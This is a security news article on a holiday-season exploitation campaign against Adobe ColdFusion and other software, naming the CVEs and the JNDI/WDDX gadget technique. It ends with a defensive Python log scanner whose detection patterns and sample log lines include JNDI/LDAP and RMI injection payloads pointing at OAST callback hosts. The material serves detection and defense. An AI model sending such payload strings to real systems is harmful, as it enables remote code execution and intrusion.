The Christmas Blitz: Coordinated Attack Spikes to 2.5M Requests via Adobe ColdFusion
In the midst of the Christmas holidays, researchers at GreyNoise detected a large-scale cyberattack targeting vulnerable Adobe ColdFusion servers. Within a short period, more than 2.5 million malicious requests were recorded, pointing to a coordinated and technically sophisticated operation that touched dozens of different technologies.
The initial wave of attacks focused on roughly a dozen well-known vulnerabilities in Adobe ColdFusion, with approximately 6,000 direct exploitation attempts observed. Further analysis, however, revealed a far broader campaign. Two primary IP addresses, registered to the Japanese provider CTG Server Limited, generated millions of requests probing nearly 800 distinct vulnerabilities across 47 different technology stacks. Around 10,000 unique domains were used to verify successful intrusions.
The timing of the attack was deliberate. Nearly 68 percent of the traffic occurred on December 25, a day when most corporate security teams operate with reduced staffing. This suggests a high degree of attacker awareness regarding organizational workflows and security monitoring practices.
To confirm successful compromises, the attackers leveraged the ProjectDiscovery Interactsh infrastructure, enabling real-time visibility into which systems had been breached. This capability accelerated subsequent phases of the operation, including potential persistence and lateral movement within affected networks.
Particular emphasis was placed on critical vulnerabilities such as CVE-2023-26359, a remote code execution flaw that was targeted 833 times. CVE-2023-38205, which allows attackers to bypass access control mechanisms, saw 654 exploitation attempts, while CVE-2023-44353 was abused in 611 cases. The primary intrusion technique involved JNDI/LDAP injection via the WDDX deserialization mechanism, using the JdbcRowSetImpl gadget chain to trigger remote code execution.
Beyond ColdFusion, the campaign extended to a wide array of additional targets, including Java application servers, popular content management systems, web frameworks, Atlassian products, network devices, and video surveillance systems. The Confluence vulnerability CVE-2022-26134 alone attracted more than 12,000 exploit attempts. Even the long-known Shellshock flaw (CVE-2014-6271) was not overlooked, drawing over 8,500 exploitation attempts.
The attack infrastructure was hosted within autonomous system AS152194, operated by the Hong Kong–registered company CTG Server Limited, which has previously surfaced in investigations into phishing campaigns and spam operations. Within its network, researchers identified FUNNULL CDN infrastructure linked to attacks against luxury brands, pointing to weak abuse controls and rapid expansion of its IP address space.
Organizations running ColdFusion are urged to apply security updates as soon as possible to remediate vulnerabilities, including CVE-2023-26359 and CVE-2023-38205. In addition, monitoring systems should be configured to detect JNDI injection attempts, suspicious callback domains, and characteristic network fingerprints associated with the attackers. Continuous vulnerability scanning and vigilant tracking of new exploitation attempts remain essential pillars of effective defense.
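The detection advice above (JNDI injection attempts and suspicious callback domains) can be turned into a small log triage script. The following is an added example written for this article; it is not GreyNoise's tooling nor anything from the campaign itself. It assumes a simplified combined-log format with an extra quoted request-body field, as a WAF or reverse proxy might emit (real Apache access logs do not record bodies), uses the public Interactsh server domains documented by ProjectDiscovery as the callback-domain list, and all log lines, IP addresses (documentation ranges) and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Public Interactsh (OAST) server domains documented by ProjectDiscovery.
# Self-hosted Interactsh instances use arbitrary domains, so extend this list
# with whatever callback domains your own DNS/egress telemetry shows.
OAST_DOMAINS = ("interact.sh", "oast.pro", "oast.live", "oast.site",
                "oast.online", "oast.fun", "oast.me")

# Indicator rules, applied to the URL-decoded request path + body.
# Rule names are hypothetical labels chosen for this example.
JNDI_RULES = [
    ("jndi_lookup", re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)),
    ("remote_class_loading_uri", re.compile(r"\b(?:ldaps?|rmi|iiop)://", re.IGNORECASE)),
    # WDDX packet that references the JdbcRowSetImpl gadget named in the article.
    ("wddx_jdbcrowset_gadget", re.compile(r"<wddxPacket[\s\S]*?JdbcRowSetImpl", re.IGNORECASE)),
]

# Constructed log format: CLF fields, then an extra quoted request-body field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<body>.*)")?$'
)
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


def decode(text, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(rounds):
        new = unquote(text)
        if new == text:
            break
        text = new
    return text


def callback_domains(text):
    """Return hostnames in the text that fall under a known OAST domain."""
    hits = set()
    for host in HOST_RE.findall(text):
        h = host.lower()
        if any(h == d or h.endswith("." + d) for d in OAST_DOMAINS):
            hits.add(h)
    return sorted(hits)


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode(m["path"] + " " + (m["body"] or ""))
    tags = [name for name, rx in JNDI_RULES if rx.search(decoded)]
    cbs = callback_domains(decoded)
    if not tags and not cbs:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "path": m["path"],
            "tags": tags, "callbacks": cbs}


def scan_log(lines):
    """Run every line through analyse_line and keep only the findings."""
    return [f for f in map(analyse_line, lines) if f]


def top_sources(findings):
    """Source IPs ranked by number of suspicious requests (most first)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample log: one benign request, one benign request that merely
# mentions "ldap", a URL-encoded JNDI lookup, a WDDX body naming the gadget
# with an LDAP callback, and a double-encoded JNDI lookup from a second IP.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Dec/2025:10:12:01 +0000] "GET /products.cfm?id=42 HTTP/1.1" 200 5120 ""',
    '198.51.100.7 - - [25/Dec/2025:10:12:05 +0000] "GET /search.cfm?q=ldap+server HTTP/1.1" 200 880 ""',
    '203.0.113.5 - - [25/Dec/2025:03:14:07 +0000] "GET /index.cfm?user=%24%7Bjndi%3Aldap%3A%2F%2Fcb2.interact.sh%2Fa%7D HTTP/1.1" 500 0 ""',
    '203.0.113.5 - - [25/Dec/2025:03:14:09 +0000] "POST /example/handler.cfc HTTP/1.1" 200 0 '
    '"<wddxPacket version=\'1.0\'>...JdbcRowSetImpl...ldap://cb1.oast.fun/x...</wddxPacket>"',
    '203.0.113.9 - - [25/Dec/2025:03:20:41 +0000] "GET /login.cfm?u=%2524%257Bjndi%253Armi%253A%252F%252Fcb3.oast.pro%252Fz%257D HTTP/1.1" 500 0 ""',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["path"], f["tags"], f["callbacks"])
    print("top sources:", top_sources(found))
```

Running the block flags three of the five constructed lines and ranks 203.0.113.5 first with two hits. The bounded re-decoding is what catches the double-encoded request on the last line; a single `unquote` would miss it. Because the callback list only covers the public Interactsh servers, pair this with DNS or egress logs so that callbacks to self-hosted OAST infrastructure also surface.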